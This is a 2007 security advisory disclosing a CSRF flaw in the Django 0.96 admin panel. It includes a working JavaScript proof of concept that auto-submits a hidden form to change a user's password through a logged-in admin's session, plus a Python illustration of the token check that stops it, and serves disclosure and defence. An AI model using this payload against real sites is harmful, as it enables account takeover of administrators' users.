
| Subject: | Django 0.96 (stable) Admin Panel CSRF |
|---|---|
| Date: | Mon, 29 Oct 2007 17:29:36 -0600 |
Author: J. Carlos Nieto. Date: Oct 21, 2007
There exists a security hole in Django's default admin panel.

Background
==========
Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables; it also allows changing any user's password. See more at http://www.djangoproject.com

Summary
=======
Django has, by default, no CSRF protection. This may allow an attacker to change any user's password by tricking a victim with admin privileges into visiting a specially forged web page (even on a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed; otherwise nothing will happen.

Severity
========
Mild. This problem exists only with the default installation and can be easily solved using the middleware found here: http://www.djangoproject.com/documentation/csrf/.
Proof of concept
================
<script type="text/javascript">
window.onload = function() {
    var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";
    var pass = "funky";
    var param = {
        password1: pass,
        password2: pass
    };
    var form = document.createElement('form');
    form.action = url;
    form.method = 'post';
    form.target = 'hidden';
    form.style.display = 'none';
    for (var i in param) {
        try {
            // ie
            var input = document.createElement('<input name="'+i+'">');
        } catch(e) {
            // other browsers
            var input = document.createElement('input');
            input.name = i;
        }
        input.setAttribute('value', param[i]);
        form.appendChild(input);
    }
    document.body.appendChild(form);
    form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
Solution
========
Use Django's CSRF protection in all your applications. Take a look at http://www.djangoproject.com/documentation/csrf/.
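To make the fix concrete, here is an added illustration (not Django's own code, and not part of the advisory) of the check that the linked CSRF middleware performs: a per-session token derived from the server's SECRET_KEY is injected into every rendered form and required on every POST, so the forged cross-origin form above, which can only supply password1 and password2, is refused. SECRET_KEY, SESSION_ID and the two request dictionaries are constructed values, and the HMAC-SHA256 derivation is a choice made for this sketch.

```python
import hmac
import hashlib
from typing import Dict, Optional

# Hypothetical stand-ins for Django settings and session state (constructed values).
SECRET_KEY = "example-secret-key-do-not-reuse"
SESSION_ID = "b3f1c2d4e5"  # constructed session cookie value


def make_csrf_token(session_id: str, secret_key: str = SECRET_KEY) -> str:
    """Per-session token: a keyed hash of the session id, so a page served from
    another origin cannot compute it without the server-side secret."""
    return hmac.new(secret_key.encode(), session_id.encode(), hashlib.sha256).hexdigest()


def check_post(session_id: Optional[str], post: Dict[str, str],
               secret_key: str = SECRET_KEY) -> bool:
    """Accept a state-changing POST only if it carries the token bound to the
    session (the middleware's request-side check)."""
    if session_id is None:
        return False  # no session, nothing to bind the token to
    submitted = post.get("csrfmiddlewaretoken", "")
    return hmac.compare_digest(submitted, make_csrf_token(session_id, secret_key))


def hidden_field(session_id: str, secret_key: str = SECRET_KEY) -> str:
    """The hidden input the middleware adds to each <form> it renders; only
    pages produced by the server itself receive it."""
    return ('<input type="hidden" name="csrfmiddlewaretoken" value="%s" />'
            % make_csrf_token(session_id, secret_key))


# Constructed requests: the forged form from the proof of concept, and a
# legitimate submission from a page the server rendered.
FORGED_POST = {"password1": "funky", "password2": "funky"}
LEGIT_POST = {"password1": "funky", "password2": "funky",
              "csrfmiddlewaretoken": make_csrf_token(SESSION_ID)}

if __name__ == "__main__":
    print("forged request accepted:", check_post(SESSION_ID, FORGED_POST))      # False
    print("legitimate request accepted:", check_post(SESSION_ID, LEGIT_POST))   # True
```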
Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License
=======
Copyright 2007 J. Carlos Nieto
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.